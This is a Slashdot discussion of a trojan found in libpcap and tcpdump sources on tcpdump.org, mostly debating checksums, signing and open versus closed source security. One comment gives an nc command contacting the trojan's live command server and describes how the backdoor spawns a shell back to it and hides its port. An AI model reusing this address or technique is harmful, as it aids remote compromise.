Trojan Found in libpcap and tcpdump

msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."

Glad I use Gentoo

[rob-fu]

Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.

How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.

Re:Glad I use Gentoo

[dohcvtec]

How did it get into tcpdump.org's sources exactly?
Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.

Re:Glad I use Gentoo

[elrond1999]

Emerge Does get sources from TCPDump if all other mirrors are down. Excerpt from ebuild:
SRC_URI="http://www.tcpdump.org/release/$ {P}.tar.g z
http://www.jp.tcpdump.org/release/${P}.tar.gz"

SRC_URI is a last resort mirror..
Lucily the MD5 sum catched the trojan: (From the gentoo ebuild digest)
MD5 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz 428737

Re:Glad I use Gentoo

[taviso]

I think the worst thing is that the server the trojan connects to is still operating :

$ nc -vvv 212.146.0.34 1963
mars.raketti.net [212.146.0.34] 1963 (?) open
M sent 0, rcvd 1

The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:

A - program exits
D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
M - closes connection, sleeps 3600 seconds, and then reconnects


maybe someone should contact the machine administrator before more people get owned.

Re:Glad I use Gentoo

[luismunoz]

[Insert the obligatory joke about /. slashdotting this server too] :)

Re:Glad I use Gentoo

[replica]

The mirrors contained the trojan as well.

Besides, this is an exploit of trust, no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963, the actual trojan appears in the configure script.

How many times have you downloaded sources and blindly ran ./configure && make? This is certainly a case for running builds in a systrace jail.

For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.

Re:Glad I use Gentoo

[kasperd]

[Insert the obligatory joke about /. slashdotting this server too] :)

Seriously if a lot of people modified the trojan to connect and find out what the cracker is up to, we might find out some interesting stuff.

Re:Glad I use Gentoo

[Marc2k]

I agree with your points about this being an exploit of trust, but the ibiblio.org mirrors did *not* contain Trojaned versions of the source, the HLUG page declared them as safe versions.

Re:Glad I use Gentoo

[Tassach]

Systrace is a good idea, but I think a better soution for most people is to rely on a certifying entity to ensure that they get clean code. This is, IMHO, the real value that RedHat gives: it's well worth $60/yr/system to be ensured that the package updates you get have been screened by someone who's looking for exactly this sort of thing.

Re:Glad I use Gentoo

[Afrosheen]

Another reason I like to run Mandrake on my servers. Mandrake is pretty thorough about security and checking their code, and the mirrors give my md5 checksummed rpms so I know they're all authentic.

Granted, there have been one or two rpms that have had security warnings issued and new rpms have appeared nearly immediately, but AFAIK nothing has been trojaned like this.

Re:Glad I use Gentoo

[Codifex+Maximus]

Yep. The cracker is evidently in-the-know and should be expected to know that we know. He probably also knows that we know he knows we know... you know?

Re:Glad I use Gentoo

[Tomble]

however, the md5sums would catch it (the md5sums in Gentoo are of the non-trojaned version, luckily)

Seeing the fact that the modifications to the source helped to obscure the trojan by making the pcap library quietly ignore packets associated with the remote site, reminded me of the paranoia I tend to feel over security, and the mechanisms we use for it.

Such as, what if a cracker got into my machine and set up (amongst other things) a patched version of md5sum, that knew which files had been altered, and what their orignal md5sums were, so I couldn't rely on that for my security? This paranoia went as far as worrying about whether it would be possible for someone to alter gcc, such that not only would it add malware functions to anything I compiled, but also to work out when it was being used to compile a compiler, and install this same such functionality into that. I spent ages trying to convince myself that that would be far too complex to do, maybe even impossible * , but at the same time tried to work out ways to bootstrap a C compiler that I could believe was indeed utterly trojan-free.

<sigh> I expect there's a word for that, and I'm sure it's not one I want to hear :P

* -I'm sure that it could be made to use certain cues, such as filenames, etc, to decide that it was compiling part of a specific compiler, such as another copy of gcc, and only do the modification on that. But I'm sure you can't write an algorithm to detect that a piece of code constitutes a compiler, let alone part of one (because of course, gcc only works on one source file at a time, not whole projects).

Re:Glad I use Gentoo

[kasperd]

He probably also knows that we know he knows we know... you know?

You got a point there, I see. But does he already know that we think he probably knows that we know he knows we know? Anyway I really don't care what he knows, I just want to know what he is going to do.

Re:Glad I use Gentoo

[Codifex+Maximus]

He's going to find a way to overflow a buffer, root yer box or get you to download a trojaned source, install it and blindly give it root priveleges, plant a back door and stay out of sight.

The worst crackers are the one's you never hear about.

as soon as this evening...

[mirko]

apt-get update...
well, I have not installed these sniffing proggies, so it should be okay.
Now it could be worse :
If you suspect your binaries to be trjanized, you'd want to sniff your own machine but if (and it is the case) the sniffer is trojanized, then it could possible hide such "activities"...
I actually read the article and it however seems that it was not the case here...
phew :-)

Re:as soon as this evening...

[Megane]

If you suspect your binaries to be trjanized, you'd want to sniff your own machine but if (and it is the case) the sniffer is trojanized, then it could possible hide such "activities"... I actually read the article and it however seems that it was not the case here...

If you read the article more carefully, you will notice that the binaries aren't trojaned. This is a trojan in the build scripts only. So ironically, only the paranoids who build from source (but aren't paranoid enough to demand an MD5) got hit by this.

Re:as soon as this evening...

[OrangeSpyderMan]

If you read the article more carefully, you will notice that the binaries aren't trojaned.

Phew, glad to hear that, I was worried the trojaned sources actually built trojaned binaries - glad you got that cleared up for us.

Re:as soon as this evening...

[arkanes]

Okay, I've been confused about this MD5 thing. Most often, the MD5s are either in a file in the ftproot, or in the readme if you've owned the server enough to stick a trojan in the source code, can't you just put in the MD5s of your altered source? I thought the main reason for checksums was to check for corrupt/missing data after the download, which was way more important in the noisy line modem days.

Re:as soon as this evening...

[OrangeSpyderMan]

You don't seem that confused to me! :-) Your point is entirely valid, if the checksum is on the compromised FTP server, it's not going to be much help. If it's on a seperate webserver, there's a chance it'll be valid, but using a checksum, while being a quick and reasonably simple way of checking such downloads, should never be taken as a guarantee. They only thing they will guarantee, is that the copy you have on your hd is the same as the copy that's on the server. Only if you can trust the source of the checksum are they useful in such circumstances, otherwise take them with a pinch of salt.

Re:as soon as this evening...

[EvilAlien]

ln -s apt-get windows-update

Re:as soon as this evening...

[harlows_monkeys]

The funny thing about the paranoids who build from source is that, unless they actually look at the source, it doesn't gain them anything. There are three ways to build from source.

1. Just grab the source and build it. This is no better than grabbing a binary and running it, as far as security goes.

2. Grab the source, check the MD5 sum, and then build it. This is no better than grabbing the binary, checking the binary's MD5 sum, and then running it.

3. Grab the source, diff it against the previous source you were running, and at least glance at the diffs to see if anything looks suspicious. This is the only way that using source gives you more security than using the binary.

People using source for security who are in category 1 or 2 are just fooling themselves.

Re:as soon as this evening...

[harlows_monkeys]

Correct.

The right way to do things is for the person who makes the release package (e.g., the tarball, or the rpm, or whatever) to digitally sign it. They should do the signing on a machine other than the web server or FTP server. Ideally, they do the signing on their development machine, which is safetly tucked away on a network that crackers can't get to.

Re:as soon as this evening...

[kevinank]

Okay, I've been confused about this MD5 thing. Most often, the MD5s are either in a file in the ftproot, or in the readme if you've owned the server enough to stick a trojan in the source code, can't you just put in the MD5s of your altered source?

To be useful the MD5 file should be signed, and the GPG key that signed it should be one that you know and trust. Even that may not be enough if the key owner can be tricked into revealing his private key, or the trojan horse can be introduced into the code on the code owners development machine, but it does add one layer of depth to your security.

The first time I had a server hacked (mountd exploit, xmas '99) the machine details were sold on IRC, probably in exchange for credit card numbers, to a somewhat clueless Singapore exchange student who proceeded to delete all of my syslog files so that when I logged in remotely the root mailbox was full of complaints about missing logfiles. The rooted system was up for about a week, during which time it probed several thousand IPs for basic exploits, hosted an IRC channel through eggdrop (together with names of the hacker's friends and passwords), all on a machine with no rootkit installed and very little attempt to hide activity.

Basically I got lucky the first time, and ever since then I've been paranoid, in hopes there won't be a second time. But with a smart hacker and a good root kit, I think even with my paranoia that I could miss a hacker on my machine for a long time, so I suspect it is only a matter of time before some well known developer gets hacked and has signed sources distributed with a trojan horse inside.

Re:as soon as this evening...

[dark_panda]

One thing that would be useful would be for the author to either GPG/PGP sign the file with the MD5 sums with a trusted signiture or sign the actual source/binary tarballs themselves. A lot of linux vendors seem to be doing this recently.

J

Re:as soon as this evening...

[zen+parse]

If you read the script properly, you'll see it does trojan the binaries built from it. "The (relevant) gencode.c diff:" part shows how it filters out the port used by the trojan.

Re:as soon as this evening...

[Paladin128]

Still, it's important that the source is available. The paranoid people that try step 3, or actually look at the source, are the reason I trust Open Source software. If it was a closed source app, and someone patched the binary with a somewhat stealthy trojan, we might not have known for months.

Using Open Source Software is about trust for me; I have no problem if someone uses closed source apps on a non-crucial desktop machine. I'm very dubious using any closed source apps on any server I deploy, however.

Re:as soon as this evening...

[dbarclay10]

People using source for security who are in category 1 or 2 are just fooling themselves.

You know that. I know that. Try telling THEM :) (Where "THEM" includes my boss, who makes me compile everything from source [and for Christ's sake, I maintain packages in the Debian archive!], but won't pay me or anybody else to actually *audit* the source, god-damnit.)

Re:as soon as this evening...

[nzhavok]

Basically I got lucky the first time, and ever since then I've been paranoid, in hopes there won't be a second time

I got r00ted earlier this year. Serves me right for running a severly underpatched box I suppose. Probably not too much of a problem since I was on dialup thou. Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC? Just wondering :)

Re:as soon as this evening...

[dasunt]

First, a disclaimer - I don't know a thing about compilers, and for coding - what I know can fill a very small bucket. However, that doesn't stop most people on slashdot from posting, so it shouldn't stop me. :)

I was told that building from source makes the compiled code partially machine-specific. Thus an exploit that worked in the default binary might not work in the binary that I compiled.

Is there any compiler gurus that want to clarify this for me one way or another?

Thanks

Re:as soon as this evening...

[kevinank]

I got r00ted earlier this year. Serves me right for running a severly underpatched box I suppose. Probably not too much of a problem since I was on dialup thou. Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC? Just wondering :)

Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.

Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)

Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.

I imagine that Debian users would argue likewise for apt-get.

Re:as soon as this evening...

[kevinank]

Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC?

Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.

At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.

I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)

Handing out other peoples passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.

Hrmm

Who would have thought that TCPDUMP would have crap like that in it?

Eventually, this would happen

[Rotten]

And if I don't remember, this happened befrore. Of course this is one of the biggest strenghts of the Open Source Model.
Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows but on Open Source is easyly detected.

Re:Eventually, this would happen

[khendron]

Easily detected? I wonder about this. If you look at the date stamp on the trojaned configure script, it is December 10th, 2001.

Does that mean that this trojan has been around for almost a year before anybody noticed? If that's true, it does not meet my definition of "easily detected".

Re:Eventually, this would happen

[Rotten]

Personally I've seen many backdoors in closes source software, even more, as a programmer years ago, I was instructed to put backdoors on Banking software by my employer and the bank auditing team. And let me tell you that the security was so bad that I personally switched my bank account from that institution to another.
I don't think the only irrelevant comment is thinking that bad things(r) happens only in one place. Like I said, on open source software, I Can Audit Myself The Code.

Re:Eventually, this would happen

[Rotten]

Of course you have never disected a rootkited server. Nobody trust the date stamps, not even my grandmother does it.

Have you ever changed the date of a file? It's quite easy.

Re:Eventually, this would happen

This argument can of course be reversed: Because sources are open, one can insert trojans.

So there's no point mentioning it.

The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.

That's more like it -I think-.

Re:Eventually, this would happen

[Rotten]

Please, I just replyed to two other "MAYBE" Posts. Talk about facts:

The same that applies to somebody breaking into a open source code repository applies to a closed source repository.

If the trojaned code is inserted after the aditing and goes into a production/distribution state, then the consumer/user has NO WAYS to detect the problem.

You are talking about the same Microsoft that wants to take to court independant researchers that detect security flaws in MS products?

Or the same Microsoft that hides security problems on their products?

And...Have you ever used CVS?

Re:Eventually, this would happen

[shatfield]

Some "kiddie" most likely did not do this.

Perhaps this is the work of an international ring of expert black hat hackers who are doing this in order to build up their network of computers that are available as jumping points for future hacking?

I'm not worried about "kiddies" in the closed source world, but about the incredibly devious companies that produce programs. Don't think for a second that Microsoft hasn't put back doored software onto your computer.. that's already been documented.

Re:Eventually, this would happen

[khendron]

Of course time stamps are not to be trusted. That is not the point I am trying to make.

I am actually asking a question: how long was this trojan released before it was discovered? I, personally, do not know. I was hoping somebody else could tell me the answer.

Re:Eventually, this would happen

[r55man]

Does that mean that this trojan has been around for almost a year before anybody noticed? If that's true, it does not meet my definition of "easily detected".

I downloaded libpcap/0.7.1 from tcpdump.org on September 2 of this year (just 2 months ago), and it was not trojaned (I keep a record of md5 sums, and was able to check this just now).

Probably whoever modified the file just touched it to resotre the original timestamp. This is trivial to do.

Re:Eventually, this would happen

[Melantha_Bacchae]

An AC wrote:

> closed src doesn't have its src on some
> webserver for some kiddie to trojan in the first
> place. sure the possibility of some employee or
> the employer itself to trojan the src, but most
> open source trojans are someone breaking into
> the web server and uploading modified src. by
> definition this wont happen with closed src
> since closed src doesn't release src, so your
> argument is irrelevant.

Oh, no? Look here:

http://news.zdnet.co.uk/story/0,,s2082221,00.htm l

Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".

Point is, closed source can be vunerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.

"At this moment, it has control of systems all over the world.
And...we can't do a damn thing to stop it."
Miyasaka, "Godzilla 2000 Millennium" (Japanese version)

Re:Eventually, this would happen

[bellings]

Now - who has most to gain from a highly visible trojan that's in fact virtually useless - Microsoft.

No! It's John Ashcroft! This is just the first step towards the Brave New World Order, as correctly fortold on that ground-breaking show "The X-Files."

Before Chris Carter and David Duchovney were eliminated and replaced with robotic clones by the old CIA lackeys of George Bush Senior, that show was the only thing on television that really explained what was going on in the world. There was a brief attempt by the FOX network to continue feeding you important news about technology and politics, but the Lone Gunmen show was quickly eliminated by the evil forces...

Re:Eventually, this would happen

[Bruce+Perens]

You don't need the source to trojan something. In fact, most trojans are simply virus-infected binaries. The entire purpose of most viruses is to trojan binary programs with another copy of the virus.

Bruce

Re:Eventually, this would happen

[aridhol]

Not necessarily. Take, for example, the Mozilla Project. Anyone is able to submit a patch, but it won't get into the codebase until it has been reviewed twice (three times during a release period). Any major open-source project should have something similar (although I admit that I don't know much about any other project's procedures).

Re:Eventually, this would happen

[Bruce+Perens]

Well, consider the alternative. What do you call a program that trojans a binary? Most viruses do just that, don't they? So, we have ample proof that binaries can be trojaned, and there is less chance for you to find out because you don't have the source.

Bruce

Re:Eventually, this would happen

[Bruce+Perens]

Uh, I'm not so sure. How do you check binaries to see if they have been trojaned? You run a virus scanner. What do viruses do? Most of them trojan a binary with a copy of themselves. How does a virus get found? By its effects. How does a source-code trojan get found? By people reading the source, or by its effects.

Bruce

Re:Eventually, this would happen

[Bruce+Perens]

Remember Interbase? It came with a trojan from Borland. The Open Source folks found it only AFTER the program was made open source. It had the trojan for at least 6 years before it became Open Source. It was running airplane reservation systems. Somebody got a lot of free flights.

Why do you think only an employee can trojan a binary, anyway? Most viruses modify binaries. Certainly many virus-infected binaries have been distributed professionally.

Bruce

Re:Eventually, this would happen

[Bruce+Perens]

In handling the press and public perception for this, it's important that we make the point that binary programs are trojaned all of the time. In fact, most viruses have as their sole purpose the modification of binaries to insert a trojan copy of the virus into the binary, and to execute the virus payload. Much proprietary software has been distributed in infected state.

The difference is that with Open Source you have an additional means of detecting the corruption - not only by its effects (as with the binary), but by reading the source.

Bruce

Re:Eventually, this would happen

[Bruce+Perens]

Also, we need to get better about signing our archives and heeding the signatures. Com'on folks! I wrote about this in the old linuxworld.com webzine in 1996!

Bruce

Re:Eventually, this would happen

[13Echo]

Things aren't just *added* to the codebase of open source programs. You can't just walk up and pop some code into the codebase. It doesn't work that way. There always a code maintainer who reviews the changes before applying the patches. I can't think of any exceptions to this. Can you?

Re:Eventually, this would happen

[legoboy]

You don't need the source to trojan something. In fact, most trojans are simply virus-infected binaries. The entire purpose of most viruses is to trojan binary programs with another copy of the virus.

How quickly the world forgets how things like the original Back Orifice were distributed... Too funny to read 'This couldn't happen with closed source!'

Re:Eventually, this would happen

[FallLine]

Uh, I'm not so sure. How do you check binaries to see if they have been trojaned? You run a virus scanner. What do viruses do? Most of them trojan a binary with a copy of themselves.

Oh give me a break. There's a world of difference between a virus that blindly inserts malicious code (e.g., destroy sector 0) into any binary it can get its hands onto and a true trojan that was written for a special purpose by an actual human being. Although it's technically possible to insert a trojan into a binary file it is at least as hard as open source code is easy to audit. For instance, your average disgruntled sysadmin could modify, say, an open source financial software package pretty damn easily (not to mention the fact that he also has the means to place it) to, say, deposit a fraction of every deposit into his account (ok, that's not original), but that same person is unlikely to have the skill or the patience to make a truly undetectable trojan in a binary/proprietary package. Likewise, a hacker (yes, I know) can easily trojan an open source login program, but not a closed source one. Empirically speaking, there are a couple dozen complete backdoor packages for Linux and other open source systems, but none that I know of for Windows (well certainly not a lot). Now maybe windows can be backdoored in other ways, but the point still stands. This is especially true when the software is updated with newer versions; the open source backdoor can be trivially modified for relatively minor changes while the closed source backdoor cannot be so easily modified. If you are going to assert that open source is easier to audit, then you must also admit that it is easier to trojan. The two go hand in hand.

Re:Eventually, this would happen

[dylan_-]

What a load of crap! Internet Explorer saves your URL/Searches! STOP THE PRESSES! Internet Explorer saves cookies and history! BREAKING NEWS! OMIGOD IT'S A CONSPIRACY!

And keeps them after you've instructed it to clear its history and cookies. That's the point. Didn't you read the article?

Whoa, Microsoft installed "secret" files! How evil! The system attribute has only been around since, uh, DOS 1.0 or something!

And doesn't display them even when you turn on the display of hidden and system files in explorer. Didn't you read the article?

I would complain if Konqueror didn't show me all dot files after I'd enabled viewing them, or if the history file was being backed up without my knowledge.

Re:Eventually, this would happen

[MarkusQ]

Oh give me a break.

Oh, give me a break. Your post is riddled with misconceptions & logical inconsistancies. For example:

There's a world of difference between a virus that blindly inserts malicious code (e.g., destroy sector 0) into any binary it can get its hands onto and a true trojan that was written for a special purpose by an actual human being.

So, the "true trojan" was written by an "actual human being" whilst the "virus" was written by...what? A tree frog?

No, it was written by an actual human being.

To do what? To "destroy sector 0"? How fast would that spread? Typically, a virus is designed to attach a copy of itself to the binary, producing a composite that contains the original code and cody written by the virus writter, in much the same way that a trojaned program is a composite of code from the same two sources.

And so on.

-- MarkusQ

P.S. You may want to check your sources. A preliminary scan indicates that you may have been trojaned by the MSFUD virus.

Re:Eventually, this would happen

[mosch]

hell, you can change the date from the command line... just use touch (it takes an optional timestamp)

Re:Eventually, this would happen

[bockman]

Obviously there are exceptions - that's how this occurred - unless of course you are suggesting that the maintainer of this package was complicit in adding the trojan.

If this troian got inside like the others (OpenSSH and Bind, IIRC), it was _not_ a patch submitted to the project. Simply, somebody rooted the FTP server and substitute the official tarball with the troyanize one.
In other words, the weak point that was exploited was not that anybody can contribute to an open source project ( which is not a weakness at all IMO) but that source tarballs are hosted on insufficiently protected FTP servers.

There are counter-measures against this weakness. As long as distros use them (and I hope they do), it is unlikely that one of these trojans will slip into an officia CD.

Re:Eventually, this would happen

[Marc2k]

I'm not siding with either paradigm on this one, but you can't broadly apply something that Microsoft did (of all companies) to the rest of the closed source world. There is some merit and dignity left in a few of the companies, and surely the world's leader in insecure data solutions should not be the archetypal closed source company. I'm not saying that the original poster was very lucid or correct, but surely he had a point. Let me amend:

No closed source corporation worth its salt would ever leave source anywhere near a webserver.

Microsoft has generally always done a piss poor job with information security, even in handling their own information.

Re:Eventually, this would happen

[tshak]

If your closed source software has backdoors or trojans...well....
Well, that's why you have peer review, software test engineers (that test for security, not just breaking bugs). The reality is I don't have time to find these trojans, so I expect a company to do it internally. True, with Open Source there are "more eyes" looking at the code, but there's no guaruntee of the competance of those eyes.

Re:Eventually, this would happen

[tshak]

Microsoft had their source available to some cracker for three months back in 2000.

Just because _parts_ of the Windows Source was leaked thanks to help from an Employee doesn't mean that that "cracker" could modify the code and check it in.

Re:Eventually, this would happen

[FallLine]

What a nit. You say riddled and yet you can only name one supposed inconsistency which really is not and it is not even apropos to the question at at hand. No where did I say that a human did not author viruses originally. What I was referring to, is that, while a virus is ultimately derived from a human, the application is, of necessity, so generic that it does not substantively interact with code in the program which it is infecting. In other words, an actual human can produce code for a specific application, but the virus, by definition not a human, does not. For instance, it may insert a block or two of binary code into at a couple locations, but its sole purpose is to propogate itself further and to, possibly, carry some malicious code (e.g, destroy sector 0, look it up if you don't know where the MBR in DOS is located). Contrast this with a trojan that was authored by a human for a specific purpose to intercept particular functions or what have you and do them in a way that is not easy to detect. [Note: while it may be technically possible to make that kind of specific virus, these are practically unheard of, and does not in any way mean that open source is any less easy to trojan]

Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

Re:Eventually, this would happen

[Melantha_Bacchae]

Marc2k wrote:

> I'm not siding with either paradigm on this one,
> but you can't broadly apply something that
> Microsoft did (of all companies) to the rest of
> the closed source world.

The poster I responded to claimed it was impossible for closed source to be similarly cracked into. I simply pointed out one example where it was.

> No closed source corporation worth its salt
> would ever leave source anywhere near a
> webserver.

You don't need a webserver to have a computer cracked into. The web is a very recent addition to the internet. There were worms and other nastiness crawling around networks well before the web was ever invented.

If an individual closed source developer has internet access on their development machine (for say email and online help - MSDN in the Microsoft world), the internet has access to their source code. Something as simple as an emailed trojan executable arriving via Outlook could send source files home to its master, and deliver patches from its master. (I am pointing out a security hole to patch here, don't go doing anything like this!)

BTW, most corporations aren't worth a thimble of salt. Corners get cut, marketing makes insane deadlines, laziness and sloppiness abound. It is even worse now that more companies have 24 hour broadband access piped to the same PC that houses development work. People just don't think, and management only cares about the bottom line and department politics.

Windows: "Go talk to my friend, an 800 pound monopoly-abusing gorilla!"
Mac: "And here's my good buddy, the 66,000 ton Godzilla!"
Godzilla: Stomp! ;)

Re:Eventually, this would happen

[John+Hasler]

> Well, that's why you have peer review, software
> test engineers (that test for security, not just
> breaking bugs).

How do you know that your closed source vendor has that? Do you take the salesman's word?

> ...but there's no guaruntee of the competance of
> those eyes.

No, but the large number makes it likely that at least one set will be competent. Where's the guarantee with closed source?

Re:Eventually, this would happen

[swv3752]

It surely does mean that it was possible. What's the level at which you are willing to bet that this wasn't done? that's what I thought.

Re:Eventually, this would happen

[sheldon]

But it doesn't necessarily mean it was probable.

Re:Eventually, this would happen

[shatfield]

Wow, someone had a blue screen this morning!

You obviously didn't read the article. Microsoft does this OUTSIDE of the "cookies anc caching" system... this is a HIDDEN FROM THE USER source that Microsoft can pull from to get every page that you've visited, every URL you typed, etc.

If Linus were to do this, Alan Cox would quickly become the defacto Linux kernel developer.. with Uncle Bill in control of the corporations that we work for, we don't have that luxury.

Re:Eventually, this would happen

[dvdeug]

The reality is I don't have time to find these trojans, so I expect a company to do it internally.

How do you know the programmers aren't the one's who put the trojan there? There's a number of trojans, especially backdoors, put there by the programmer. (Remember WarGames?) IIRC, Borland Database had a backdoor added in '95 that was revealed when it was open sourced in 2000.

Re:Eventually, this would happen

[tshak]

Where's the guarantee that your car is designed to last 250,000 miles? Sure, you can open the hood, but you (nor any individual) can determine the quality of the design simply by opening the hood. You look at a Company's track record. When Honda has proven itself by building cars that last long with minimal maintenance, that's how you know. This is the same with Airplane's, or any other engineered product. It's ludicrious to assume that the blueprints for a 747 need to be "open" so that we can ensure that there's no bugs in the GPS computer (for example).

Re:Eventually, this would happen

[tshak]

Remember WarGames?

Yes, I own that _MOVIE_ (case in point).

Re:Eventually, this would happen

[dvdeug]

I own that _MOVIE_ (case in point).

It was a parenthetical comment, and followed by a real-life case. As far as I can tell, WarGames was one of the most accurate theatrical portrayals of hacking ever.

Re:Eventually, this would happen

[evilpenguin]

It should be easy to find this person. The trojan downloads evil code from a specific web site. This site is either the perps or was cracked by the perp. They will be hunted down.

There is virtually no way to be absolutely certain of the integrity of any code, unless you audit it yourself. Even fans of OpenBSD have to admit that they are trusting the OpenBSD auditors. Some would use this to argue that you can place greater trust in closed code. But, to use Microsoft as an example (but not to claim that they are the adminstrator of all evil), the infamous Word macro virus first appeared on a Microsoft beta release and I seem to recall a story a little over a year ago about Russian hackers having spent a few merry weeks in the Windows 2000 source code. Trust now?

The point is that we all use code on faith. Even should Palladium become reality, you are just transferring trust to another party. The lesson I think we in the Free Software community should take away from this is that we should make better use of the tools we have. We should should provide GPG signed MD5 checksums of all of our "official" tarballs. Some projects do this, some do not. As I just pointed out, this is not a guarantee, but it does provide a chain of accountability.

Re:Eventually, this would happen

[yem]

Last time I checked, GCC source tarballs STILL aren't signed, despite this being brought to the maintainer's attention. The perception that MD5 sums are sufficient is extremely common.

Trojaned gcc, anyone?

Re:Eventually, this would happen

[tshak]

and followed by a real-life case.

A case which does not substantiate that the flaw had anything to do with the nature of "closed source" software - maybe Borland just had a poor code review process, or maybe it didn't happen at all and it was a rumour.

WarGames was one of the most accurate theatrical portrayals of hacking ever.


I'm not sure whethor to mod this +5 Funny or -1 Clueless. I really hope you were joking.

Re:Eventually, this would happen

[dvdeug]

A case which does not substantiate that the flaw had anything to do with the nature of "closed source" software

With in a few months of the code being open sourced, the back door was found. It stayed in closed source code for six years. Whether or not Borland could have done things to find it is irrelevant - they didn't and I bet many other vendors work the same way.

it was a rumour.

I guess it's easier to accuse me of spreading rumors then to enter "Borland database backdoor" into google and get stuff like a ZDNet article detailing the history of the bug or the CERT vulnerability note.

WarGames was one of the most accurate theatrical portrayals of hacking ever.

I'm not sure whethor to mod this +5 Funny or -1 Clueless. I really hope you were joking.

Why? He didn't fly through a 3d-cyberspace, nor did he jump through 5 layers of military-grade security in a couple minutes. He didn't have access to anything and everything controlled by computer.

He snagged the password to the teacher's computer off a Post-it note, and dug up information on the programmer of WOPR to take guesses at what the password might be, both of which are real hacking tools. He used hardware that existed and that he could realistically own. He wardialed, a habit of real hackers. I can't think of any other movie that comes close.

There are minor plot-neccessary exaggerations -- no, WOPR wouldn't have an outside line to it, and yes, the cops would have been at the door long before he got in -- but they don't mar the fact that it was fundamentally right.

Re:Eventually, this would happen

[coaxial]

I downloaded libpcap/0.7.1 from tcpdump.org on September 2 of this year (just 2 months ago), and it was not trojaned (I keep a record of md5 sums, and was able to check this just now).

You do realize of course that MD5s only provide limited security. Afterall, if I can replace the .tar.gz, why can't I also replace the .md5?

Re:Eventually, this would happen

[Bruce+Perens]

I'm not sure I agree with you about the semantics of virus vs. trojan. Please call me at the phone number on my web site to discuss this, if you wish to continue the argument.

Thanks

Bruce

Re:Eventually, this would happen

[MarkusQ]

What a nit. You say riddled and yet you can only name one supposed inconsistency which really is not and it is not even apropos to the question at at hand.

I, on the other hand, would maintain that it is to the point. It was a clear example of the sort of emotional (as opposed to rational) argument you were offering. In particular, your heated tone implies sharp distinctions that all but vanish when examined a little more calmly. They are (I would argue) an artifact not of what you are saying but of how you are saying it. For example, from your last post:

Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

• Stripped of all the heat/emotional language, your statement boils down to: "to use viruses as example of trojans you should distiguish virus attacks and trojan attacks." In other words, if I want to say "A is an example of B" I should say "A is not B"--which is not a valid statement about categorical inclusion.
  
• Even if it was true in general, it wouldn't apply in this case since "trojan" is a means of acting ("trojan" code is code that lies hidden inside a seemingly innocent program, and therefore is executed by an unsuspecting user) while "virus" is a means of propogation ("virus" code is code that spreads by using the resources of infected machines to make copies of itself). To put them in opposition is a silly as contrasting "things that swim" with "things that lay eggs".
  
